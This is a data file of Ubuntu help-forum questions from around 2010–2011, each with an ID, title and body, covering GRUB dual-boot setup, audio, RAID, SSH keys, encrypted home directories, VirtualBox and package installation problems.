22629	add windows 7 to boot menu	device boot start end blocks id system /dev/sda1 * 1 13 102400 7 hpfs/ntfs - system restore /dev/sda2 13 4674 37436416 7 hpfs/ntfs - windows 7 /dev/sda3 4674 58843 435116032 7 hpfs/ntfs - data storage /dev/sda4 58843 60802 15728640 83 linux - ubuntu 10.10 initially i installed startupmanager . this ( i think ) added another 4 instances of linux + memtest to my boot menu list . however , i did not see the grub boot menu . the computer boots into ubuntu after a few seconds . i have tried to add windows 7 , but i did not succeed . this is a part of my menu.lst file . title ubuntu 10.10 , kernel 2.6.35-24-generic uuid 1c9748e2-2f11-4a6c-91c0-7310d48c4a7a kernel /boot/vmlinuz-2.6.35-24-generic root=uuid=1c9748e2-2f11-4a6c-91c0-7310d48c4a7a ro quiet splash initrd /boot/initrd.img-2.6.35-24-generic title chainload into grub 2 root 1c9748e2-2f11-4a6c-91c0-7310d48c4a7a kernel /boot/grub/core.img title ubuntu 10.10 , memtest86+ uuid 1c9748e2-2f11-4a6c-91c0-7310d48c4a7a kernel /boot/memtest86+.bin menuentry âwindows 7âł { set root= ( hd0,2 ) chainloader +1 } and this is after upgrade-grub searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-2.6.35-24-generic found kernel : /boot/vmlinuz-2.6.35-22-generic found grub 2 : /boot/grub/core.img found kernel : /boot/memtest86+.bin updating /boot/grub/menu.lst ... done later edit : i have added the following to /etc/grub.d/40_custom and i have uncommented the hidden menu line from menu.lst , but i still cant see any boot menu . i have also tried to press esc and shift . menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' chainloader +1 } menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos0 ) ' chainloader +1 } menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' { set root= hd ( 0,0 ) chainloader +1 } menuentry `` ! windows 7 ( loader ) ( on /dev/sda1 ) '' { set root= hd ( 0,1 ) chainloader +1 } menuentry `` ! ! windows 7 ( loader ) ( on /dev/sda1 ) '' { set root= hd ( 0,2 ) chainloader +1 }
22634	behringer uca202 usb sound card does n't work on resume	when resuming from suspend , where sound output was set to pcm2902 audio codec analog stereo ( usb uca202 device output to stereo system . ) then sound will not resume . it is not muted . i have to manually reselect pcm2902 in sound properties since it will have switched back to internal audio analog ( though no sound out of monitor speakers . ) whereupon reselecting the usb card , sound will resume but will need to be un-muted first . there is no problem suspending when sound properties is set to internal audio analog stereo ( monitor speakers . ) pc will suspend & resume playing sound no problem . should i report a bug to launchpad or is there a workaround ? here is the beringer product overview .
22635	updating when running off usb stick makes it unbootable ?	i guess one should not run the software update when running off of a pendrive . each time i have , not only does the update crash , but the usb drive becomes unbootable ? should the ablitiy to run a software update be disabled for pendrive instances ?
22636	will 11.04 use other filesystem than ext4 ?	i heard something of a filesystem change . is it gon na happen in 11.04 ?
22644	mdadm : auto re-add dropped hdd	sometimes hdd might drop out of my raid , but after i fix hw problem - i have to manually find out which is device name of dropped hdd and manually re-add it . is there a way to let mdadm scan all hdds and auto-read ones which belong to array ?
22649	software center does n't prompt for password	i 'm using ubuntu 10.10 . the software center was asking me for password when i wanted to install/remove any application . since last week , it does n't prompt for password . also , i have the same problem with update-manager . however , synaptic and sudo apt-get ask for password . how to fix this ? this is link to the files that you guys need to know sudoers file /etc/polkit-1 /usr/share/polkit-1/actions/org.debian.apt.policy sudo grep -ir '^ [ ^ # ] ' /var/lib/polkit-1 grep '^ [ ^ # ] ' /etc/apt/apt.conf.d/20dbus /etc/dbus-1/system.d/org.debian.apt.conf /usr/share/dbus-1/system-services/org.debian.apt.service
22651	ubuntu one does not download files on windows xp	i just created my ubuntu one account on the machine running ubuntu and it works flawless . then i tried to access the same account from my xp machine . i can access account , and see all files , but when i try to access or download , it loads and loads , and loads , but nothing happens . why is that ? if i can access the account from a different machine i should be able to download , right ? please enlighten me . thanks in advance . apple314
22652	using pitivi to delete the middle of a video ?	i import a video into pitivi , drag it to the timeline , split the grouped a/v tracks at the start of where i want to delete and the end , then delete the middle . the audio track does what i expect , but all the video that used to be there stays there , just playing at double speed or something . i even tried just deleting the end of the video and only the end of the audio went away , the video stayed but played faster . i thought it might be just the preview , but rendering the project produces these same results . what am i doing wrong ? pitivi 0.13.5 on maverick
22661	what if my state / country does n't have a ubuntu loco team ? how can i start one ?	i know what an ubuntu team is and where to find them , but what can users do if their area does n't have a loco team ?
22662	how can i solve my truecrypt installation problem ?	i downloaded the truecrypt 64 bit .tar.gz , but it could not be opened . the archiv manager says : does not look like a tar archiv . does anybody no , how to solve this error ? os : ubuntu maverick . on lucid i had no problems to install truecrypt .
22663	how to bring up network on boot-up when networkmanager is uninstalled ?	i decided to get rid of network-manager for some reason , and now in order to get on the network , i have to run sudo ifup eth0 . here 's what cat /etc/network/interfaces gives : auto lo iface lo inet loopback allow-hotplug eth0 iface eth0 inet dhcp how do ensure i do n't have to perform this laborious process again ( how do i get the network started automatically on boot-up ) ?
22665	keyboard capslock does not work as expected sometimes	my husband has converted the entire household to ubuntu , so far things are going fine , except for this small issue , i have a ps/2 genius keyboard model , kb-06x attached to a desktop computer and on rare occasions when i am typing in any application , word processor , text editor or forms and i activate capslock what i get are lower case characters , when i deactivate capslock ( green light off ) i got upper case characters , i noticed this as far back as 8.04 and as recent as 10.04 , i have not noticed it yet on 10.1 , even if 10.1 fixes the problem i am still curious as to why this happen on the others . is it just cheap faulty keyboard or is this a known problem ?
22667	why is the firewall disabled by default ?	why is ufw firewall included in ubuntu , when it is not enabled and pre-configured by default ? most users do n't even know it is there , because no gui frontend is provided .
22670	livecd mounts the partitions , but it does n't see any	i 'm trying to install ubuntu 10.10 from live cd . i can access the partitions already created ( two ntfs and one ext3 prepared ) , but when i 'm trying to install , at the step where i should select the partition , i do n't have from where to choose . the list is empty , as you can see in the screenshot below : my hdd is @ s-ata . motherboard : asrock conroexfire-esata2
22675	shutdown / restart does not complete	sometimes when i try to shut-down or restart , i get an error saying : a program is still running : unknown not responding it gives three choices lock screen cancel reboot anyway ( or shutdown anyway ) what should i look for ? if i could configure it to always assume that i want to shutdown anyway , then that would be great . thanks
22676	triple monitor setup with an ati radeon 4200 ?	i have a relatively new powerspec computer ( i5 quad core processor , about a year or two old ) and just grabbed a new relatively inexpensive ( $ 40 ? ) graphics card . it has 1 dvi , one vga , and one hdmi output . i have two ( different type ) monitors plugged into the dvi and vga slots , and they work great . however , i can not seem to be able to get a third monitor in the hdmi slot to work . i can see the monitor ( and monitor info ) show up in display settings . however , if i try to switch the monitor to 'on ' and click apply , nothing happens . anyone have the slightest idea what the problem might be ? ( it 's a radeon graphics card fyi ; if i remember right i think it was the radeon 4200 ? )
22682	ubuntu from flash drive	i am windows user and using windows 7 on my laptop . is there any way i can run practically run and use ubuntu from flash drive or it is necessary to install it on my hard drive . please suggest ...
22686	will the official repositories update to firefox 4.0 when it 's released ?	please do not mistake this for another post resembling installing firefox 4.0 beta..i have no intention of that . what i meant to ask was in febrary or possibly march firefox 4.0 will be officially released . would the official repositories update to the latest version or should i install add the mozilla daily ppa to do this ? i am very keen on installing the latest version of firefox 4.o when it releases . the firefox website only provides .tar.bz2 files which means i need to compile from source . hence the question if the official repository updates to firefox 4.0 .
22696	where can i buy a keyboard with an ubuntu logo on the super key ?	anyone knows where i can get a keyboard to buy with the ubuntu logo on the super key ? if not where can i get some durable small plastic ubuntu logos about 8 to 9 mm in diameter that i can use to glue on my keyboard ?
22698	update-grub2 not finding windows7 partition	i have ubuntu10.10 x64 and after installing windows 7 grub dissapear i log on with my usb to reinstall grub and now grub only shows ubuntu ... then when i try to do update-grub2 i get this : root @ alienware : ~ # sudo update-grub2 generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.35-22-generic found initrd image : /boot/initrd.img-2.6.35-22-generic found memtest86+ image : /boot/memtest86+.bin ls : no se puede acceder a /var/lib/os-prober/mount/boot boot : no existe el fichero o el directorio done root @ alienware : ~ # it is in spanish but it says it cant get access to /var/lib/os-prober/mount/boot and that boot : dosent exist.. i dont know what i am doing wrong can someone help me please ?
22702	how to upgrade x.org ?	i need xorg-server version 2:1.9.0.902-1ubuntu3 installed because it contains a fix : xorg-server ( 2:1.9.0.902-1ubuntu3 ) natty ; urgency=low * add 207_dga_master_device.patch : cherrypick from upstream xserver git to fix crash with a bluetooth keyboard when using xbmc full screen . ( lp : # 597895 ) -- bryce harrington < email address hidden > thu , 06 jan 2011 12:17:16 -0800 and i need that for my xbmc to work properly , but on my machine it shows : xorg-server 2:1.9.0-0ubuntu7.1 when i run x -version any ideas ? i ca n't find any packages to install and apt-get says it 's already the most current version ...
22704	is my hard drive about to fail ?	i hear some squeaking noises sometimes when i use my computer so i ran smartctl . this is the results : === start of read smart data section === smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 short offline completed : read failure 90 % 5953 37922655 # 2 extended offline completed : read failure 90 % 5953 37922655 # 3 short offline completed : read failure 90 % 5953 37922655 # 4 short offline completed without error 00 % 429 - # 5 extended offline aborted by host 90 % 429 - # 6 short offline completed without error 00 % 429 - # 7 short offline completed without error 00 % 429 - is this a bad sign ?
22711	hard drive partitioning ?	i am not a basic user of computers , but frankly i have never done a partition of a hard drive . but i decided to shrink the only hd in the computer by 25gb for ubuntu , however i realized that ubuntu will partition the hd . however , i am stuck with a 25gb partition that i can not use , at least i think so ... can i use the partition when installing ubuntu ( version 9.10 ) or can i make the partition apart of the rest of the drive again ? when i try to delete it , windows 7 ( the only os at the moment ) prompts me stating that it is an extended partition and will be inaccessible if i do so . help ?
22716	instead of totem , what application that can play .m4v format ?	instead of totem , what application that can play .m4v format ?
22726	re-mouting the old home partition after a fresh install	thanks to this thread i know now that i should 've done this during the installation part . but i did n't . so i 'm left with my system partition and a old home partition that acts as an extra drive . i would like to know or it still possible to mount the old home partition back . i rather keep my data on that partition but if that is not option i still want to move my home folder . my system partition is just too small to host the home directory .
22735	disable locking the screen after resuming from suspend	one thing i like for macbooks is that they are usable within a second after opening their lid when they were on stand by . ubuntu always requires me to enter my password when i resume from suspend , which can be very annoying . how can i disable this ? related bugs it turns out that this really is undesired behavior , and there are several bugs related to this issue . bug # 553646 on launchpad bug # 643036 on gnome bugzilla
22743	how do i install guest additions in a virtualbox vm ?	i 've recently installed ubuntu on oracle 's virtualbox . now i want to install the guest additions . i started up my ubuntu guest os , clicked `` devices '' and chose `` install guest additions '' . nothing happened , and i do n't see the cd icon on my desktop . how can i make this work ?
22747	how to upgrade from ubuntu 10.10 to 11.04 ?	i want to upgrade from ubuntu 10.10 to ubuntu 11.04 .
22750	best way to set up dns caching ?	in order to speed up dns lookups , i want to install a dns cache or proxy . i can see at least three programs i think will do the job : bind9 , pdnsd , or dnsmasq . i would like to make sure that if i install one of i do not leave it poorly configured from a performance or security point of view . so , what would people recommend , and are there any configuration changes i should immediately make after installing ?
22754	encrypted home breaks on login	my home is encrypted , which breaks the login . gnome and other services try to find all sorts of .files , write to them , read from them and so on . e.g . .iceauthority . they are not found ( yet ) because at that moment the home is still encrypted . i do not have automatic login set , since that has known issues with encrypted home in ubuntu . when i go trough the following steps , there is no problem : boot up the system . [ ctr ] [ alt ] [ f1 ] , login . run ecryptfs-mount-private [ ctr ] [ alt ] [ f7 ] , done . can now login . i may have some setting wrong , but have no idea where . i suspect ecryptfs-mount-private should be ran earlier in bootstrap , but do not know how to make it so . some issues that may cause trouble : i have a fingerprint reader , it works for login and pam . i have three keyrings in seahorse , containing passwords from old machines ( backups ) . not just one . suggestion was that the pam settings are wrong , so here are the relevant parts from /etc/pam.d/common-auth . # here are the per-package modules ( the `` primary '' block ) auth [ success=3 default=ignore ] pam_fprintd.so auth [ success=2 default=ignore ] pam_unix.so nullok_secure try_first_pass auth [ success=1 default=ignore ] pam_winbind.so krb5_auth krb5_ccache_type=file cached_login try_first_pass # here 's the fallback if no module succeeds auth requisite pam_deny.so # prime the stack with a positive return value if there is n't one already ; # this avoids us returning an error just because nothing sets a success code # since the modules above will each just jump around auth required pam_permit.so # and here are more per-package modules ( the `` additional '' block ) auth optional pam_ecryptfs.so unwrap # end of pam-auth-update config i am not sure about how this configuration works , but ut seems that maybe the*optional* in auth optional pam_ecryptfs.so unwrap is causing the ecryptfs to be ignored ?
22755	time resets after reboot	my time zone is gmt and the time is set to 5 hours before this every time i reboot ( american time ? ) ubuntu 11.04 64b dual boot with win7 asus m4a78lt-m
22760	how do you rename files ignoring file extension in terminal ?	i have several folders of video files that need to be renamed to something uniform , eg : foldername.videotypexvideonumber.avi . i have looked at creating a shell script to make this easier . the mv command seems to be the best way to do this . however , every guide/tutorial/manpage i 've seen says that when i rename a file i have to also include the file extension . this would normally be fine , but some folders have videos of multiple file types , eg .mkv and .avi and even some .rmvb files . so , what i need to know is if there 's a way to rename files through the terminal without having to specify the file type when doing so - basically so that the extension stays the same , regardless of what it is before renaming .
22763	how to increase the signal power of a wi-fi card ?	i use an atheros card that requires ath9k driver . are there any tools that can be used to increase the signal power of the wi-fi card ?
22764	ca n't scroll with laptop `` pointing stick ''	i 'm using ubuntu in virtualbox and can not scroll . what can i do ? edit : my host is windows 7 . i 'm using a laptop ( lenovo thinkpad x201s ) and i 'm trying to scroll not with a mouse wheel but with the red dot which function as a mouse .
22770	how can i install numpy on python 3.1 ?	i have ubuntu 10.10 server on ec2 . i installed python 3.1 , and now i want to install numpy on it . how do i do it ? i tried easy_install-3.1 numpy but got this error : refactoringtool : refactored /tmp/easy_install-miuli2/numpy-1.5.1/build/py3k/numpy/core/defchararray.py refactoringtool : files that were modified : refactoringtool : /tmp/easy_install-miuli2/numpy-1.5.1/build/py3k/numpy/compat/py3k.py refactoringtool : /tmp/easy_install-miuli2/numpy-1.5.1/build/py3k/numpy/core/defchararray.py running from numpy source directory.traceback ( most recent call last ) : file `` /usr/local/bin/easy_install-3.1 '' , line 9 , in < module > load_entry_point ( 'distribute==0.6.14 ' , 'console_scripts ' , 'easy_install-3.1 ' ) ( ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/command/easy_install.py '' , line 1855 , in main with_ei_usage ( lambda : file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/command/easy_install.py '' , line 1836 , in with_ei_usage return f ( ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/command/easy_install.py '' , line 1859 , in < lambda > distclass=distributionwithouthelpcommands , **kw file `` /usr/lib/python3.1/distutils/core.py '' , line 149 , in setup dist.run_commands ( ) file `` /usr/lib/python3.1/distutils/dist.py '' , line 919 , in run_commands self.run_command ( cmd ) file `` /usr/lib/python3.1/distutils/dist.py '' , line 938 , in run_command cmd_obj.run ( ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/command/easy_install.py '' , line 342 , in run self.easy_install ( spec , not self.no_deps ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/command/easy_install.py '' , line 582 , in easy_install return self.install_item ( spec , dist.location , tmpdir , deps ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/command/easy_install.py '' , line 612 , in install_item dists = self.install_eggs ( spec , download , tmpdir ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/command/easy_install.py '' , line 802 , in install_eggs return self.build_and_install ( setup_script , setup_base ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/command/easy_install.py '' , line 1079 , in build_and_install self.run_setup ( setup_script , setup_base , args ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/command/easy_install.py '' , line 1068 , in run_setup run_setup ( setup_script , args ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/sandbox.py '' , line 30 , in run_setup lambda : exec ( compile ( open ( file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/sandbox.py '' , line 71 , in run return func ( ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.14-py3.1.egg/setuptools/sandbox.py '' , line 33 , in < lambda > { '__file__ ' : setup_script , '__name__ ' : '__main__ ' } ) file `` setup.py '' , line 211 , in < module > file `` setup.py '' , line 204 , in setup_package file `` /tmp/easy_install-miuli2/numpy-1.5.1/build/py3k/numpy/distutils/core.py '' , line 152 , in setup file `` setup.py '' , line 151 , in configuration file `` /tmp/easy_install-miuli2/numpy-1.5.1/build/py3k/numpy/distutils/misc_util.py '' , line 972 , in add_subpackage file `` /tmp/easy_install-miuli2/numpy-1.5.1/build/py3k/numpy/distutils/misc_util.py '' , line 941 , in get_subpackage file `` /tmp/easy_install-miuli2/numpy-1.5.1/build/py3k/numpy/distutils/misc_util.py '' , line 878 , in _get_configuration_from_setup_py file `` numpy/setup.py '' , line 5 , in configuration file `` /tmp/easy_install-miuli2/numpy-1.5.1/build/py3k/numpy/distutils/misc_util.py '' , line 713 , in __init__ valueerror : 'build/py3k/numpy ' is not a directory
22774	looking for usb vga adapter that works for sure ?	i ca n't seem to get a straight answer on this . i would like to add a 3rd display onto my laptop + external monitor setup . while my current setup ( thinkpad x201 ) has an open vga port ( am using the laptop 's display + displayport with external monitor ) it appears that i ca n't drive 3 monitors natively . i would like to explore what my alternatives are to get another display into the mix . i 've found lots of references to displaylink but nothing absolutely confirmed to work .
22778	how can i run an executable from a cd when it does n't have the executable bit set ?	a textbook i 'm using came with a cd containing a few supplementary applications . to my pleasant surprise , it appears to include an installer for linux . the readme file on the cd provides the following installation instructions : pc : linux double-click on the folder 'linux' double-click on the file 'install.bin' follow instructions on screen . but doing this just produces the following error message : could not display `` /media/bdh de/linux/install.bin '' . the file is of an unknown type attempting to run the installer via the command line results in a permissions error : ak @ aux : ~ $ ls /media/bdh\ de/ linux os x readme.txt windows xp windows xp - no java ak @ aux : ~ $ ls -l /media/bdh\ de/linux/ total 41177 -rw-r -- r -- 1 ak ak 42164549 2005-07-26 03:39 install.bin ak @ aux : ~ $ /media/bdh\ de/linux/install.bin bash : /media/bdh de/linux/install.bin : permission denied while , to my disappointment , the message fails to inform me of what permissions i am lacking , a quick glance at the output of ls reveals that the installer has not been marked executable . how do i run it ? the type of the file is : ak @ aux : ~ $ file /media/bdh\ de/linux/install.bin src/bdh-de/install.bin : posix shell script text executable
22786	windows files in ubuntu and vice versa	it 's pretty easy to access all my windows files in ubuntu , but now i wa n't to do the opposite thing : i wa n't to access my ubuntu files from windows . i ca n't seem to find a way to do this easily , are there 'things ' out there that can do this ? i 'm using windows 7 and ubuntu 10.10 .
22793	reading specific file fails - how to identify the problem ?	when i try to read a specific file by running od filename od hangs . e2fsck reported no errors . sudo e2fsck /dev/sdb6 -n -f i plan to run a badblocks ckeck but that will take ages to complete . is there anything else i can do ?
22798	can multiple reboots fix any problems ?	maybe i 'm wrong but more than once it happened to me that some problems suddenly got fixed after a number of turn-on/turn-off cycles . i also read somewhere that this was even recommended in some other os 's ( windows ) .
22803	how do i start deluge in the background ?	basically i have deluge all setup for my account with transdroid and the webui and everything , however , what i would really like , is for it to start the moment the computer does so that no matter who logs in , my downloads continue . furthermore , i do n't want other users to be able to see it when they log in , not in the taskbar or in the notification area . what would be ideal would be to have it as a service which i could control through the deluge gui . any suggestions ?
22811	how can i get the rhythmbox visualization window back in rhythmbox ?	i just chose to have the visualization in separate window once , now it looks like this : i ca n't find a way to get it back in rhythmbox . there are no buttons and no menu entries to move it back . any ideas ? thanks .
22812	what does the `dmesg` error : `` composite sync not supported '' mean ?	question : i see [ 20.473125 ] composite sync not supported and several such entries when i run dmesg . what do they mean ? background : i 'm trying to debug a problem where my laptop wo n't suspend . since acpi seems happy and i can suspend easily from the command line , i 've turned to tracking down all boot-up errors/warnings . so i run dmesg | grep not and , amongst other shtuff , i get : 728 : [ 17.267120 ] composite sync not supported 733 : [ 18.009061 ] composite sync not supported 740 : [ 18.159289 ] registered panic notifier 749 : [ 18.162500 ] vga16fb : not registering due to another framebuffer present 757 : [ 18.598251 ] composite sync not supported 776 : [ 20.473125 ] composite sync not supported 777 : [ 20.932266 ] composite sync not supported 778 : [ 28.350231 ] composite sync not supported 779 : [ 28.924913 ] composite sync not supported 780 : [ 35.480658 ] composite sync not supported and the full log for the few lines right around that first appearance ( line 728 ) is listed at the bottom of my post ( i 'd happily include anything else ) . any ideas what could be causing this ? i 've read several sites : ubuntuforums # 1 irc chat # 1 one post talks about ? ? adobe flash ? ? causing this error ? some others also suggest that it might be an nvidia related problem , but i 've got a dell latitude d630 with an integrated intel graphics -- so nvidia is n't the problem . [ 17.207142 ] phy0 : selected rate control algorithm 'minstrel' [ 17.207833 ] registered led device : b43-phy0 : :tx [ 17.207849 ] registered led device : b43-phy0 : :rx [ 17.207865 ] registered led device : b43-phy0 : :radio [ 17.207927 ] broadcom 43xx driver loaded [ features : pl , firmware-id : fw13 ] [ 17.267120 ] composite sync not supported [ 17.415795 ] ext4-fs ( sda2 ) : mounted filesystem with ordered data mode [ 17.602131 ] [ drm ] initialized overlay support [ 17.620201 ] input : dualpoint stick as /devices/platform/i8042/serio1/input/input7 [ 17.641192 ] input : alpsps/2 alps dualpoint touchpad as /devices/platform/i8042/serio1/input/input8 [ 18.009061 ] composite sync not supported [ 18.106042 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x100-0x3af : clean . [ 18.108115 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x3e0-0x4ff : clean . [ 18.108941 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x820-0x8ff : clean . [ 18.109676 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0xc00-0xcf7 : clean . [ 18.110356 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0xa00-0xaff : clean . [ 18.159286 ] fb0 : inteldrmfb frame buffer device [ 18.159289 ] registered panic notifier [ 18.160218 ] input : video bus as /devices/lnxsystm:00/lnxsybus:00/pnp0a03:00/lnxvideo:01/input/input9 [ 18.160286 ] acpi : video device [ vid1 ] ( multi-head : yes rom : no post : no ) [ 18.160334 ] acpi warning for \_sb_.pci0.vid2._dod : return package has no elements ( empty ) ( 20090903/nspredef-433 ) [ 18.160432 ] input : video bus as /devices/lnxsystm:00/lnxsybus:00/pnp0a03:00/lnxvideo:02/input/input10 [ 18.160491 ] acpi : video device [ vid2 ] ( multi-head : yes rom : no post : no ) [ 18.160539 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 18.162494 ] vga16fb : initializing [ 18.162497 ] vga16fb : mapped to 0xc00a0000 [ 18.162500 ] vga16fb : not registering due to another framebuffer present [ 18.176091 ] hda intel 0000:00:1b.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 [ 18.176123 ] hda intel 0000:00:1b.0 : setting latency timer to 64 [ 18.285752 ] input : hda digital pcbeep as /devices/pci0000:00/0000:00:1b.0/input/input11 [ 18.312497 ] input : hda intel mic at ext left jack as /devices/pci0000:00/0000:00:1b.0/sound/card0/input12 [ 18.312586 ] input : hda intel hp out at ext left jack as /devices/pci0000:00/0000:00:1b.0/sound/card0/input13 [ 18.328043 ] usbcore : registered new interface driver ndiswrapper [ 18.460909 ] console : switching to colour frame buffer device 180x56 [ 18.598251 ] composite sync not supported
22816	ssh key problem	i want to setup my home server to use ssh keys but when i follow the tutorial on https : //help.ubuntu.com/10.04/serverguide/c/openssh-server.html for setting up ssh keys i get this : bad port 'umask 077 ; test -d .ssh || mkdir .ssh ; cat > > .ssh/authorized_keys' i get past the part where you create the key using : ssh-keygen -t dsa but the part that asks me to do this : ssh-copy-id user @ servername is when i get the error above . thanks for the help .
22820	indicator menu replacement for notification area ?	i 'm looking for a indicator menu , that replaces the notification area . any systray icon should be in a identicator menu , because on netbooks the application menus and the systray icons overlap sometimes
22824	ca n't modify files in my shared folder ( virtualbox , guest is ubuntu , host is windows 7 )	i 'm using virtual-box . the guest is ubuntu . the host is windows 7 . i have a shared folder ( shared by the host and the guest ) . the problem is that in the guest ( ubuntu ) i can not rename/delete/edit the files in the shared folder . for instance , after i edit the file and try to save it i get the following error message : could not save the file filename . unexpected error : error renaming temporary file : text file busy in the host ( windows ) i can rename/edit/delete without any problem . what can i do ?
22829	installed indicators not showing up	i have installed a couple of indicators from the the omg ! ubuntu ! guide to the best indicator applets around . for some reason , however , none of them are showing up besides the sound , e-mail and dropbox indicators , which were already there . any ideas ?
22831	are personal settings overwritten during distribution upgrades ?	for example , in moving from maverick to natty , banshee replaces rhythmbox as the media player . but if i had installed a player different from either one of these , and uninstalled rhythmbox , how would the distribution upgrade behave ? would it still install banshee ? what if i simply uninstall and then reinstall rhythmbox ? will it upgrade to banshee ? months ago , on the lucid to maverick update , i got impatient and made the upgrade a week or two before the final release . at that time , the new ubuntu font was not implemented , so i downloaded and installed it by myself . when i upgraded to the final version , of course i had the font , but it was not set up as it should have been , with the correct font sizes . i fixed them manually later . i suppose that this happened because the system `` considered '' this to be a personal setting which should not be changed . my main question is : how does the system `` know '' whether i want to use a particular setting as the default , thus upgrading it according to the new version , or if that setting was actively set by me and , in that case keeping it intact ?
22835	how to network two ubuntu computers using ethernet ( without a router ) ?	how can i network two ubuntu computers , so that they can `` see '' each other at an ip address ?
22840	what can i change with gtkrc-2.0 ?	we can change breadcrumbs and the sidepane color , but what else can be edited with gtkrc-2.0 ?
22843	why would a hard disk be invisible to grub ?	i just installed a new ssd in my system , and i 'm having numerous problems trying to boot from it . when i try to boot , the boot-loader-loader ( intel matrix storage manager ) skips right over it and tries to boot from the second drive . i installed grub to the mbr on the second drive , pointing it to the boot files on the ssd . unfortunately , the ssd is invisible to grub . running ls from the grub rescue prompt shows only the second drive . however , if i boot from a livecd or flash drive , i can see and mount the ssd . i believe this is a bios problem , but i 'm still curious . how can my ssd show up in ubuntu but not grub ? what is the difference between the way grub finds filesystems and the way ubuntu does ?
22845	what is the best solution to backing up your computer to an external hd ?	i have an external hard drive that i would like to make backups to , what i would like is have a program that is easy to set up to accomplish this for me . thanks
22846	is there a unity-like global menu applet for gnome-panel ?	in the top panel of unity there 's the title of the window , and when it 's moused over , a global menu pops up . is there a similar indicator for 10.10 ? i 've found the indicator applet appmenu and window controls for the panel , but i 'm looking for one that works similar to the titlebar/global menu indicator . thanks in advance !
22848	can i change from mint lxde to vanilla ubuntu from the command line or do i need a fresh install ?	i have installed mint lxde 10.04 on my netbook , but would prefer the standard ubuntu . would it be easy ( one or a few commands ) to get the computer to the same state as it would have if i did a fresh install of ubuntu , or should i just do the fresh install ?
22849	unable to hibernate with virtualbox running	i am having problem hibernating and suspending my dell laptop while virtualbox is running ( xp guest ) . i have tried default kernel method , uswsusp and tuxonice and none of them works . but if i close virtualbox , then hibernation and suspend works fine . following are system specs . os : ubuntu 10.10 64bit ( completey updated ) ram : 4gb swap : 8 gb root : 500 gb ( of which , about 79 % is free ) my laptop model is dell inspiron n5010 . it has ati hd 5000 series graphic chipset and i am used proprietary drivers for it , installed via jockey . thanks .
22850	tasksel can not be installed	i am trying to install tasksel in order to install lamp but for some reason it always gives me this error : e : unable to locate package tasksel root @ theshop : ~ # sudo apt-get install tasksel reading package lists ... done building dependency tree reading state information ... done e : unable to locate package tasksel root @ theshop : ~ #
22851	how can i tell gnome to execute a custom command , cli-style ?	whenever you want to open a file with a program that 's not in the right-click shortlist , you click 'use a custom command . ' however , the way that 's worded led me to believe that it may be possible to treat the file as if it were $ @ , command line input . what i want to be able to do is add the custom command 'cp ( clickedfile ) /my/directory ' ... however , the custom command 'cp $ @ /my/directory ' did not work .
22852	desktop effects reset to none , no title bar	since yesterday , the title bars of windows are missing . i have n't changed any configuration . i noticed 'desktop effects ' set to none . changing it back to 'extra ' made everything proper . i had to customize my desktop effects again in compizconfig manager too . now this problem reappears after every restart . i must also say that , once i change compiz settings all the three radio buttons in 'desktop effects ' remain unselected . but when this problem arises , it will be set to 'none ' .
22863	i am in group root and can not use synaptic or sudo	i do not know the root password . i am only in group root . how do i add myself to other groups ? i am getting this error on trying to open root terminal : failed to run /usr/bin/x-terminal-emulator as user root . the underlying authorization mechanism ( sudo ) does not allow you to run this program . contact the system administrator .
22866	a glitch after ubuntu installation . can not boot ubuntu	i am trying to create a dual boot of ubuntu 10.10 with windows 7 . my hard disk allocation were as follows : windows 7 ntfs 100 gb /boot ext4 200 mb swap linux swap 4 gb / ext4 46 gb after installation is complete , instead of getting the boot screen of ubuntu , it directly boots from windows 7 without asking anything . what is wrong ? i run the live cd again using usb drive and i see that the \boot , and \ are occupied with most likely ubuntu data . now how do i point my laptop to point to ubuntu boot instead of windows boot
22871	software to read a qr code ?	i saw a qr code reading a book , but i do n't have a smart phone to check it . so i just took a picture of it and saved my pc . and i downloaded libdecoderqr0 , libdecodeqr-dev , libdecodeqr-examples for reading it . but i do n't know how to use it . what do i do next , or is there a nicer way to read qr codes ?
22875	will the wobbly windows effect be in ubuntu 11.04 ?	will the wobbly windows effect be available in ubuntu 11.04 ?
22876	secondary display background not updating when using twinview and compiz	my secondary monitor stopped updating the desktop background on my maverick after an update i ran on january 10th . my desktop looks like this : if i disable compiz , the problem goes away . i 've tried resetting the compiz settings to defaults . what i have n't tried is a clean reinstall , but that i would obviously use as the last resort . i 'm running a 64-bit ubuntu 10.10 with a geforce 8600 as the gpu .
